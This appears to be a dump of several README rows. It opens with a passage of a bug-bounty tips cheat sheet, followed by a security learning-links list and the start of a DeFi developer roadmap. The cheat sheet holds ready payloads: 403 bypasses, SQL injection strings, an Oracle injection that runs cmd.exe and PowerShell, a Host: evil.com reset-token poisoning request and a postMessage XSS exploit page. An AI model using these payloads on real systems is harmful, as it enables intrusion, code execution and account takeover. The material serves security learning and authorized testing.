–> HTTP 200 OK\n\nX-Original-URL: /admin\nX-Override-URL: /admin\nX-Rewrite-URL: /admin\n\n/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n\n```\n# Data leakage through .json\n```\nHere’s a tip to achieve sensitive data leak using .json extension.\n\nRequest:\nGET /ResetPassword HTTP/1.1\n{""email"":""victim@example.com""}\n\nResponse:\nHTTP/1.1 200 OK\nNow let’s try this instead:\n\nRequest:\nGET /ResetPassword.json HTTP/1.1\n{""email"":""victim@example.com""}\n\nResponse:\nHTTP/1.1 200 OK\n{""success"":""true"",""token"":""596a96-cc7bf-9108c-d896f-33c44a-edc8a""}\n```\n# Generate wordlist for target\n```\necho ""bugcrowd.com"" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew\n```\n\n# Check for SQLi\n```\n/?q=1\n/?q=1'\n/?q=1""\n/?q=[1]\n/?q[]=1\n/?q=1`\n/?q=1\\n/?q=1/*'*/\n/?q=1/*!1111'*/\n/?q=1'||'asd'||' <== concat string\n/?q=1' or '1'='1\n/?q=1 or 1=1\n/?q='or''='\n```\n# SQLi in Email parameter\n\n| Payload | Response |Injection Status |\n| ------ | ------ |------ |\n|{“email”:”asd@a.com”}| {“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\n|{“email”:”asd a@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\”asd a\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”asd(a)@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\”asd(a)\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\t\n|{“email”:”asd’a@a.com”}|\t{“code”:0,”status”:500,”message”:”Unspecified error”}|\tNot Valid|\t\n|{“email”:”asd’or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}\tValid|\t\n|{“email”:”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot 
Valid|\n|{“email”:”\”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 7,854 milis|\n|{“email”:”\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 8,696 milis|\n|{“email”:”\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tNo delay|\n\n### Oracle\n```\n1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --\n1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL --\n1' AND 1=1 UNION SELECT null, user FROM DUAL --\n```\n\n\n### Cool BurpPlugins\n```\nAutorize – To test BACs (Broken Access Control)\nBurp Bounty – Profile-based scanner\nActive Scan++ – Add more power to Burp’s Active Scanner\nAuthMatrix – Authorization/PrivEsc checks\nBroken Link Hijacking – For BLH (Broken Link Hijacking)\nCollaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)\nCommand Injection Attacker\nContent-Type Converter – Trying to bypass certain restrictions by changing Content-Type\nDecoder Improved – More decoder features\nFreddy – Deserialization\nFlow – Better HTTP history\nHackvertor – Handy type conversion\nHTTP Request Smuggler\nHunt – Potential vuln identifier\nInQL – GraphQL Introspection testing\nJ2EE Scan – Scanning J2EE apps\nJSON/JS Beautifier\nJSON Web Token Attacker\nParamMiner – Mine hidden 
parameters\nReflected File Download Checker\nReflected Parameter – Potential reflection\nSAML Raider – SAML testing\nUpload Scanner – File upload tester\nWeb Cache Deception Scanner\n```\n# Detect framework via favico\n```\ncat urls.txt | python3 favfreak.py -o output\n```\n\n### Password Poisoning\n```\n(1) Normal request:\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: target.com\nLink received:\nhttps://target.com/reset-link=1g2f3guy23g\n(2) Basic HHI (Host Header Injection):\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nnone\nError 404 - request blocked\n(3) Bypass technique:\n\nRequest:\nPOST https://target.com/password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nhttps://evil.com/reset-link=1g2f3guy23g\n```\n### Find hostsname form given IP\n\n```\necho 192.168.69.69 | cero\n```\n\n### XSS Post Message POC\n```\nVulnerable PostMessage\n<script src=""//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js""></script>\n<script>\nwindow.addEventListener(""message"", (event) => {\nconsole.log(event.data);\n$(event.data)\n}, false);\n</script>\n\n\nExploit \n<!DOCTYPE html>\n<html>\n <head>\n </head>\n<body>\n<script>\nvar myWindow = window.open(""http://example.com/test.html"")\n</script>\n<script>\nsetInterval(function(){myWindow.postMessage(""<img src=x onerror=alert(123);>"",""*"");},3000);\nwindow.onmessage = function (e) {\nconsole.log(e);\n};\n</script>\n</body>\n</html>\n```\n### Deserialization \n```\nhttps://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/\nhttps://github.com/tyranid/ExploitRemotingService\nhttps://github.com/nccgroup/VulnerableDotNetHTTPRemoting\nhttps://github.com/pwntester/ysoserial.net/blob/master/README.md\nhttps://nickbloor.co.uk/2018/02/28/popping-wordpress/\n```\n### From Path Traversal to Source Code in Asp.NET MVC 
Applications\n```\nhttps://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html\nhttps://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/\nhttp://bit.ly/2NDZc73\n```\n### Hacking IIS\n```\nhttps://www.youtube.com/watch?v=HrJW6Y9kHC4\n```\n\n\n### Geting endpoints from web-archive\n```\ncat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau\n```\n\n### CLI Hacking Cheatsheet\nGetting JS from live hosts\n```\ncat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u\ncat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted\ncat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200\ncat hosts.httprobe.js.sorted.200 | httpx -silent -sr -mc 200 \n```\nSearching for RXSS\n```\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl \ncat hosts.httprobe.gau.unfurl | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200\ncat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox\n```\nGeting endpoints with potential hackable parameters\n```\ncat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a hosts.httprobe.gau \ncat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext\nfor i in `cat hosts.httprobe.gau.unfurl.ext`; do grep $i hosts.httprobe.gau | grep \? 
| head -n1 | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done\ncat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200\n```\nBruteforcing juicy endpoints\n```\nfor i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done\nfor i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep ""url\"""" | grep -v ""replayproxyurl"" |grep -v ""proxyurl"" | grep -v ""FUZZ"" | cut -d \"" -f4 >> qh-urls.txt;done \n```\n\n### Random\n```\nhttps://regex-generator.olafneumann.org/\nhttps://regex101.com/\n```\n\n### Reference\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\nhttps://soroush.secproject.com/blog/\n"
6,"# Learning and Resources\nUseful links for security professionals and students\n\n\n# General NetSec and Math\n[Network Security and Technology](https://www.youtube.com/user/Computerphile)\n\n[Math](https://www.youtube.com/user/numberphile)\n\n[Hundreds of talks from Security Professionals](https://www.youtube.com/user/DEFCONConference)\n\n[Network Security Community](https://www.reddit.com/r/netsec/)\n\n[Exploits](https://wwww.exploit-db.com)\n\n[Vulnerability Database](https://nvd.nist.gov/)\n\n\n# Exploitation Practice Areas\n[Vulnerable VM Download](https://www.vulnhub.com/)\n\n[Small Challenges](https://www.root-me.org/?lang=en)\n\n[Test Network](https://www.hackthebox.eu/)\n\n\n# Capture the Flag Tutorials\n[20+ CTF Walkthroughs](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)\n\n[Billy Madison Themed](https://www.youtube.com/watch?v=0gQiv_pkOPw&t=981s)\n\n[Mr Robot Themed](https://www.youtube.com/watch?v=pRcrSSiF_7w)\n\n\n# Shells\n[Cheatsheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)\n\n\n# Web Application Testing\nTools - Burp, SQLmap, dirb, OWASP Zed\n\n[Cheat Sheet](https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/)\n\n[Practice App](https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)\n\n[Book](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=sr_1_1?s=books&ie=UTF8&qid=1524862328&sr=1-1&keywords=web+application+pentesting)\n\n[Videos](https://www.youtube.com/watch?v=Fj0n17Jtnzw&list=PLZOToVAK85MqYHbkAVK-ViD-Xb7pF6RKq)\n\n\n# Secure Coding\n[Development Standards C/C++](https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682)\n\n[Book C/C++](http://www.informit.com/store/secure-coding-in-c-and-c-plus-plus-9780321822130)\n\n[SANS Top 25](http://cwe.mitre.org/top25/)\n\n[Open Source Tools](https://continuousassurance.org/swamp-in-a-box/)\n\n[Enterprise Code Scanner](https://scan.coverity.com/)\n\n\n# Stack Based Buffer 
Overflow\n[Overview](https://www.youtube.com/watch?v=1S0aBV-Waeo&t=884s)\n\n[Guide](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)\n\n\n# Heap Based Buffer Overflow\n[Overview (play on 1.25 speed)](https://www.youtube.com/watch?v=rtkRYxbt-r8)\n\n[Guide](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)\n\n\n# Exploit Development Continued\n[Debugger](http://www.immunityinc.com/products/debugger/)\n\n[More Tutorials](https://www.corelan.be/index.php/articles/)\n\n\n# Privilege Escalation\n[Windows](http://www.fuzzysecurity.com/tutorials/16.html)\n\n[Linux](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n\n\n# Cryptography\n[Diffie-Hellman Key Exchange](https://www.youtube.com/watch?v=YEBfamv-_do)\n\n[RSA](https://www.youtube.com/watch?v=wXB-V_Keiu8&t=2s)\n\n[Encryption Tester](https://github.com/nmap/nmap/blob/master/scripts/ssl-enum-ciphers.nse)\n\n\n# Training Courses\n[Penetration Testing](https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/)\n\n[Free Government Training](https://fedvte.usalearning.gov/)\n\n[The best but expensive](https://pen-testing.sans.org/training/courses)\n\n\n# Bug Bounty Programs\n[Bugcrowd Bug Hunting](https://www.bugcrowd.com/)\n\n[Google](https://sites.google.com/site/bughunteruniversity/improve)\n\n[Government](https://www.hackerone.com/resources/hack-the-pentagon)\n\n\n# Django Web Development\nCourse\n()\n\nVideos\n()\n\n\n# Python Programming\nCourse\n()\n\nVideos\n()\n"
7,"# DeFi Developer Road Map\n\n**Here we collect and discuss the best DeFi & Blockchain researches and tools - contributions are welcome.**\n\n**Feel free to submit a pull request, with anything from small fixes to translations, docs or tools you'd like to add.**\n\n- **Disclaimer: All information (tools, links, articles, text, images, etc.) is provided for educational purposes only! All information is also based on data from public sources. You are solely responsible for your actions, not the author** ❗️\n\n[![Support Project](https://img.shields.io/badge/Support-Project-critical)](https://github.com/OffcierCia/support/blob/main/README.md) [![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap) [![Supported by LEGO](https://img.shields.io/badge/Supported%20by-LEGO-%2300A3FF)](https://www.notion.so/LEGO-Lido-Ecosystem-Grants-Organisation-d7f0bf0182d44348b6173639d2e8363d)\n[![Research Base](https://img.shields.io/badge/Research-Base-lightgrey)](https://github.com/OffcierCia/ultimate-defi-research-base)\n[![Mail](https://img.shields.io/badge/Mail-offcierciapr%40protonmail.com-brightgreen)](mailto:offcierciapr@protonmail.com)\n\n## **Translations:**\n\n- [French](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_fr.md)\n- [Korean](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_ko.md)\n- [Japanese](https://www.wenyanet.com/opensource/ja/6304f1549168d4612c5c5064.html)\n- [Italiano](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_it.md)\n- [Telugu](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_tel.md)\n- [Gujarati](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_guj.md)\n- [Spanish](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_es.md)\n- 
[Chinese](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_cn.md)\n\n## Roadmap\n\n![Roadmap](./DeFiRoadMapNewSVG.svg)\n\n# Navigation\n\n**[Alternative navigation](https://cia.start.me/p/dlaxD0/ciaofficerv2)** ❗️\n\n#\n\n| Topic | Instant Link |\n| :--------------: | ------------------------------------------------------------------------------------------------------------------------- |\n| Basics | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#basics) |\n| dApps | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#dapps) |\n| Frameworks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#frameworks) |\n| zk-snarks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#zk-snarks) |\n| Further Readings | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#further-readings) |\n| Security | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#security--safety) |\n| DeFi | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#defi) |\n| ENS | 
[Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-name-service) |\n| NFT | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#non-fungible-token-nft) |\n| Stable Coins | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#stable-coins) |\n| General Info | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-tools) |\n| Side Chains | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#side-chains) |\n| MEV | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#mev---maximal-extractable-value--miner-extractable-value) |\n| Tools Collection | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#tools-collection) |\n| ETH 2.0 | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-20) |\n| Front End | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#front-end) |\n| Project Manag. | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#project-management) |\n\n#\n\n**| Special Notes:**\n\n- [My Blog on Mirror](https://officercia.mirror.xyz/UpFfG7-1E4SDJttnmuQ7v4BMc4KrCXzo80vtx7qV-YY)\n- [All known smart contract-side and user-side attacks & attack vectors](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://officercia.mirror.xyz/p1ieZdxQWH4yHCNOXNPHyT8So1cY0X_wMGKwdmavi7s)\n- [An awesome cheatsheet from the Pessimistic.io Team](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [All-about-NFT security ](https://graph.org/NFT-security-01-28)\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [All good TG Dev communities ](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)\n- [Solidity language cheatsheets, tools and references collection](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [Solidity 
Tutorials](https://telegra.ph/Solidity-Tutorials-12-21)\n\n# Basics:\n\n- Learn the basics of Distributed Ledger Technology (DLT)\n- Bitcoin protocol [Explained](https://medium.com/coinmonks/bitcoin-white-paper-explained-part-1-4-16cba783146a)\n- Elliptic Curve [Cryptography](https://medium.com/coinmonks/learn-how-to-code-elliptic-curve-cryptography-a952dfdc20ab)\n- Read [Blockchain Explained](https://www.investopedia.com/terms/b/blockchain.asp)\n- Watch [Blockchain - A visual demo](https://www.youtube.com/watch?v=_160oMzblY8)\n- Watch [But how does bitcoin actually work? - 3b1b](https://www.youtube.com/watch?v=bBC-nXj3Ng4)\n- Learn the basics of [Computer Science](https://github.com/ossu/computer-science)\n- Learn DeFi In-Depth - just [watch this YouTube playlist](https://www.youtube.com/@campbellharvey/playlists)\n- Teach yourself crypto - visit [teachyourselfcrypto.com](https://teachyourselfcrypto.com)\n\n#### Ethereum\n\n- Learn the basics of Ethereum\n- Ethereum Virtual Machine (EVM): turing complete\n- Learn about Wallets, Accounts (EOA), Private/Public Keys\n- Learn about transactions, Gas, Metamask\n- Ethereum clients/Nodes, Geth\n- Infura infrastructure\n\n#### EVM\n\n- [NOXX](https://noxx.substack.com/archive?sort=new)\n- [Digging deep into the EVM mechanics during contract function calls - Part 1](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy?utm_source=profile&utm_medium=reader2)\n- [Let's take a trip down memory lane - Part 2](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-d6b?utm_source=profile&utm_medium=reader2)\n- [Demystifying Storage Slot Packing - Key Knowledge for the EVM Hackers - Part 3](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-3ea?utm_source=profile&utm_medium=reader2)\n- [Under The Hood - Storage Opcodes In the Go Ethereum (Geth) Client - Part 4](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-5a5?utm_source=profile&utm_medium=reader2)\n- [Another Weapon in the EVM 
Hackers Arsenal - The Power of Delegate Call - Part 5](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-a5f?utm_source=profile&utm_medium=reader2)\n- [A Treasure Trove of Data - Transaction Receipts & Event Logs - Part 6](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-16e?utm_source=profile&utm_medium=reader2)\n- [Understanding Trie Databases in Ethereum](https://medium.com/shyft-network/understanding-trie-databases-in-ethereum-9f03d2c3325d)\n- [AskMirror](https://www.askmirror.xyz)\n- [EVM Chad](https://github.com/mektigboy/evm-chad)\n- [Mudit.Blog](https://mudit.blog)\n- [Academic_Smart_Contract_Papers](https://github.com/hzysvilla/Academic_Smart_Contract_Papers)\n- [cmichel.io](https://cmichel.io)\n- [samczsun.com](https://samczsun.com)\n- [serial-coder.com](https://www.serial-coder.com/posts)\n- [notonlyowner.com](https://www.notonlyowner.com)\n- [Decentralised](https://t.me/decentraliseddotco)\n- [Awesome Blogs](https://start.me/w/nPprJD)\n- [What happens when you send 1 DAI](https://www.notonlyowner.com/learn/what-happens-when-you-send-one-dai)\n- [The Complete Guide to Full Stack Ethereum Development](https://www.useweb3.xyz/tutorials/the-complete-guide-to-full-stack-ethereum-development)\n- [Ultimate roadmap for web3 developers ""from zero to master""](https://blog.praneethreddy.me/ultimate-roadmap-for-web3-developers-from-zero-to-master?deviceType=desktop)\n- [Solidity Cheatsheets Pack + Bonus](https://telegra.ph/Solidity-Cheatsheets-Pack-03-20)\n- [L2s Explained](https://www.youtube.com/live/GnXQiFJlf2w?feature=share)\n\n#### Check out\n\n- A bunch of learning resources to choose from here: [pentacle.xyz](https://pentacle.xyz/projects?section=developer&category=learn)\n- [EVM In-Depth](https://youtu.be/RxL_1AfV7N4)\n- [LearnEVM](https://twitter.com/learnevm)\n- [Useful Solidity Patterns](https://github.com/dragonfly-xyz/useful-solidity-patterns/tree/main/patterns/off-chain-storage)\n- 
[CryptoBook](https://toc.cryptobook.us/book.pdf)\n- [Smart Contract Auditing Checklist](https://github.com/vishnuram1999/Smart-Contract-Auditing-Checklist)\n\n#### Directions\n\n- [Awesome roadmap.sh RoadMaps Collection](https://roadmap.sh)\n- [Vikvikvikkk Repo](https://github.com/vikvikvikkk?tab=repositories)\n- [Awesome Ethereum Staking](https://hackmd.io/@jyeAs_6oRjeDk2Mx5CZyBw/awesome-ethereum-staking)\n- [The Daily Ape](https://www.notion.so/The-Daily-Ape-c96c0b6727c0433a962e897ef43efb7e)\n- [Sov's Compendium](https://sovs.notion.site/sovs/Sov-s-Compendium-41f097d28dae4d09801f10cde1b2d03b)\n- [Diamond Crab](https://shuennnyyy.notion.site/shuennnyyy/DiamondCrab-Crypto-Notion-Site-5e14308d396b497fa35ccdbfdf4a2296)\n- [Immersion Den](https://immersionden.xyz)\n- [Curious Daddy](https://curiousaddys.notion.site/2935b6c3a1e249fd876ce3f318355d92?v=b46dd3524e8a4ea9873f364800a0db38)\n- [Awesome Blogs](https://start.me/w/nPprJD)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Main Navigation](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)\n- [Solana Dev & Degen Tools Packk](https://web.archive.org/web/20220820001542/officercia.mirror.xyz/XLEds6Py1Xu41WWhqv-LJ2UtH4UKl9cZTnoVx8CvDXQ)\n- [Genesis 0x01: Simplified Roadmap for Blockchain Security](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)\n- [Blockchain security guide](https://wufflz.notion.site/Blockchain-security-guide-b26aec3d920e414d8a354618d3e36eb4)\n- [DevPill](https://www.devpill.me/docs/introduction/foreword)\n- [Retrospective: Hacks in Web3](https://medium.com/@officercia/retrospective-hacks-in-web3-cc83b8ee0e93)\n- [Medium : severity vulns](https://tom-sol.notion.site/c433c81fc5964fb8b32c59ce98fec3df?v=c5ffb5c86778424c9a1fe3dd6f7f00f3)\n- [High : severity 
vulns](https://tom-sol.notion.site/f9d3a62122d34b479b52ea3e0583bd57?v=9c303b31cca845638e78c25da29fa5de)\n- [Repository of 500 web3 reports](https://drive.google.com/drive/u/2/mobile/folders/1oyGnZE2ce5t6MZ1ytMLDr5OKuQAOkEdR?pli=1)\n\n#### Smart Contract\n\n- Basics of Smart Contract: [Top 10 free Web3 courses](https://twitter.com/vedangvatsa/status/1627648600254840832)\n- Life Cycle of Smart Contract\n- Ethereum Higher Level languages (**Solidity**, Vyper, LLL, Serpent)\n- Compiling, testing, Deploying smart Contracts\n- Interacting with smart contracts using web3.js or web3.py\n- Read [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#:~:text=The%20Ethereum%20blockchain%20uses%20an,tokens%20are%20generated%20and%20awarded.)\n- Read [this article](https://blog.zeppelin.solutions/the-hitchhikers-guide-to-smart-contracts-in-ethereum-848f08001f05)\n- Read the [Truffle Documentation](https://truffleframework.com/docs/) / [Hardhat Documentation](https://hardhat.org/getting-started/)\n- Read the [Web3 Documentation](https://web3js.readthedocs.io/en/1.0/) / [Ethers Documentation](https://docs.ethers.io/v5/)\n- Read Book [Mastering Ethereum](https://github.com/ethereumbook/ethereumbook) and watch [this channel](https://www.youtube.com/channel/UCJWh7F3AFyQ_x01VKzr9eyA/videos)\n- Read [Solidity Smart Contract Library](https://openzeppelin.org/api/docs/get-started.html) and [Solidity Base](https://solidity-by-example.org) with [Tutorial from Zombies](https://cryptozombies.io)\n- Read [Flash Crash for Cash Cyber Threats in Decentralized Finance](https://arxiv.org/pdf/2106.10740.pdf)\n\n\n#### Resources to learn Solidity\n\n- [cryptozombies.io](https://cryptozombies.io)\n- [smartcontract.engineer](https://www.smartcontract.engineer)\n- [solidity-by-example.org](https://solidity-by-example.org)\n- [useweb3.xyz](https://www.useweb3.xyz)\n- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)\n- [Books & 
Researches](https://telegra.ph/Books--Researches-01-30)\n- [Navigation: officercia.eth](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Solidity Cheatsheets Pack + Bonus](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [Solidity Treasures](https://t.me/soliditypedia)\n- [Solidity Learning Chat](https://t.me/solidity_learning)\n- [Dev Solidity Chat](https://t.me/dev_solidity)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Slitherin](https://github.com/pessimistic-io/slitherin)\n- [WTF Solidity](https://github.com/AmazingAng/WTF-Solidity)\n\n#### Smart Contract Standards\n\n- [ERCs](https://eips.ethereum.org/erc) - Ethereum Improvement Proposals\n\n#### Tokens\n\n- [ERC-20](https://eips.ethereum.org/EIPS/eip-20) - Token contract for fungible assets.\n- [ERC-721](https://github.com/ethereum/eips/issues/721) - Token standard for non-fungible assets.\n- [ERC-1155](https://eips.ethereum.org/EIPS/eip-1155) - Token standard for semi-fungible tokens\n- [ERC-918](https://eips.ethereum.org/EIPS/eip-918) - Mineable Token Standard.\n- [ERC-1363](https://eips.ethereum.org/EIPS/eip-1363) - Payable Token Standard.\n- [ERC-4626](https://eips.ethereum.org/EIPS/eip-4626) - Tokenized Vault Standard.\n- [Token Interaction Checklist](https://consensys.net/diligence/blog/2020/11/token-interaction-checklist/)\n\n#### Others\n\n- [ERC-165](https://eips.ethereum.org/EIPS/eip-165) - Creates a standard method to publish and detect what interfaces a smart contract implements.\n- [ERC-725](https://eips.ethereum.org/EIPS/eip-725) - A standard interface for a simple proxy account.\n- [ERC-173](https://eips.ethereum.org/EIPS/eip-173) - A standard interface for ownership of contracts.\n\n#### General Development Skills\n\n- Learn [GIT](https://medium.com/pixel-pioneers/the-basics-of-version-control-system-git-explained-by-designing-a-new-car-3fb3a10e9e40)\n- Create a few repositories on 
[GitHub](https://github.com/) / [GitLab](https://about.gitlab.com/)\n- Share your code with other people\n- Know the HTTP(S) protocol, request methods (GET, POST, PUT, PATCH, DELETE, OPTIONS)\n- Don't be afraid of using Google, [Power Searching with Google](http://www.powersearchingwithgoogle.com/)\n- Get familiar with terminal ([Linux/Docker](https://medium.com/coinmonks/how-to-become-a-blockchain-developer-59c830e20f15)), configure your shell (bash, zsh, fish)\n- Read a few books about algorithms and data structures, blockchain, Ethereum, Solidity\n- Do this course [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)\n- Free tutorial [Learning Solidity](https://github.com/willitscale/learning-solidity)\n- [Introduction to Smart Contract Development with Solidity](https://www.youtube.com/playlist?list=PLV1JDFUtrXpGvu8QHL9b78WYNSJsYNZsb) and [ERC20 Programming](https://www.youtube.com/watch?v=Hqx5yuskmRU&list=PLYSZ-f9LCH3sEf0UKTLCaZErJeQtK7GCD)\n- [Tudelft Repo](https://repository.tudelft.nl)\n\n#### Try these tools:\n\n- [eth-cli](https://github.com/protofire/eth-cli) - CLI tools.\n- [REPL](https://github.com/raineorshine/solidity-repl) - Solidity REPL.\n- [Remix](https://remix.ethereum.org/) - Online realtime compiler and runtime.\n- [gencall-cli](https://github.com/manifoldfinance/libcaller/tree/master/packages/gencall-cli) - An interactive smart contract encoder and sender from your ABI file\n- [Web3modal](https://github.com/WalletConnect/web3modal)\n- [Optimize Solidity Function Name](https://emn178.github.io/solidity-optimize-name/) - Optimize function names to reduce costs\n- [solc-typed-ast compiler](https://github.com/ConsenSys/solc-typed-ast) - TypeScript package providing a normalized typed Solidity AST along with the utilities necessary to generate the AST (from Solc) and traverse/manipulate it.\n- [Slither Explained - for audit](https://telegra.ph/Slither-Explained-04-19)\n\n# 
